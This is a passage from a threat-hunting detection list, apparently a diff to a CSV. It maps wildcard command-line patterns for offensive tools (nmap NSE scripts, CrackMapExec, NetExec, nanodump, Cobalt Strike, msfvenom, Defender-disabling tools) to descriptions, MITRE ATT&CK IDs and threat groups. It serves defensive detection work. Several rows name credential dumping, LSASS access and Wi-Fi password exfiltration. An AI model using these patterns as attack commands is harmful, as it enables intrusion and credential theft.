WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"* ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"* vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* web-hacking-toolkit *","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z"
+"* weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --werfault *\temp\*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* winDefKiller *","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z"
+"* windows/csharp_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --wldp-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* wmirun=true dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z"
+"* -wordlist * -spawnto *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* -word-list-path * -file-extensions *","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z"
+"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --wpad --lm --ProxyAuth --disable-ess**","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* WriteToLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z"
+"* wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z"
+"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
